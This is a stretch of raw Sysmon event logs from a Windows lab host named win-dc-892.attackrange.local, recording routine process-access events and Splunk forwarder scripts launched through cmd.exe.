12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.627{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.627{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.630{266CAFBE-6482-6064-6900-00000000AE01}3836C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.518{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.522{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.408{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
